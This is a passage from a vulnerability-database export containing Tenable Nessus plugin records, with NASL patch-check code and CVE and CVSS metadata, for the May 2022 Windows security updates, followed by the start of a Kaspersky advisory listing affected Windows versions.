script_name(english:\"KB5013944: Windows Server 2022 Security Update (May 2022)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013944. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013944\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013944\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013944'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013944])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T16:44:45", "description": "The remote Windows host is missing security update 5013941. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013941: Windows 10 version 1809 / Windows Server 2019 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", 
"CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013941.NASL", "href": "https://www.tenable.com/plugins/nessus/160928", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160928);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013941\");\n script_xref(name:\"MSFT\", value:\"MS22-5013941\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013941: Windows 10 version 1809 / Windows Server 2019 Security Update (May 2022)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013941. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013941\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013941\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013941'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013941])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T00:26:42", "description": "The remote Windows host is missing security update 5013942. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013942: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", 
"CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013942.NASL", "href": "https://www.tenable.com/plugins/nessus/160927", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160927);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-22713\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013942\");\n script_xref(name:\"MSFT\", value:\"MS22-5013942\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013942: Windows 10 Version 20H2 / 21H1 / 21H2 
Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013942. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013942\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013942\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013942'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013942])\n|| smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013942])\n|| smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013942])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-10-18T08:16:09", "description": "### *Detect date*:\n05/10/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, bypass security restrictions, gain privileges, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2019 \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2022 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 11 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 8.1 for 
x64-based systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-29137](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29137>) \n[CVE-2022-29140](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29140>) \n[CVE-2022-29106](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29106>) \n[CVE-2022-29127](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29127>) \n[CVE-2022-22019](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22019>) \n[CVE-2022-22017](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22017>) \n[CVE-2022-29104](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29104>) \n[CVE-2022-29102](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29102>) \n[CVE-2022-29151](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29151>) \n[CVE-2022-29129](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29129>) \n[CVE-2022-29122](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29122>) \n[CVE-2022-29150](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29150>) \n[CVE-2022-29132](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29132>) \n[CVE-2022-29130](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29130>) \n[CVE-2022-26927](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26927>) \n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) \n[CVE-2022-29105](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29105>) \n[CVE-2022-29113](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29113>) 
\n[CVE-2022-22011](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22011>) \n[CVE-2022-29128](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29128>) \n[CVE-2022-23279](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23279>) \n[CVE-2022-22014](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22014>) \n[CVE-2022-29133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29133>) \n[CVE-2022-29131](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29131>) \n[CVE-2022-26936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26936>) \n[CVE-2022-29115](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29115>) \n[CVE-2022-22012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22012>) \n[CVE-2022-26931](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26931>) \n[CVE-2022-22013](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22013>) \n[CVE-2022-29125](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29125>) \n[CVE-2022-29139](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29139>) \n[CVE-2022-29141](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29141>) \n[CVE-2022-22713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22713>) \n[CVE-2022-29138](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29138>) \n[CVE-2022-29112](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29112>) \n[CVE-2022-29103](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29103>) \n[CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>) \n[CVE-2022-22015](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22015>) \n[CVE-2022-26933](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26933>) 
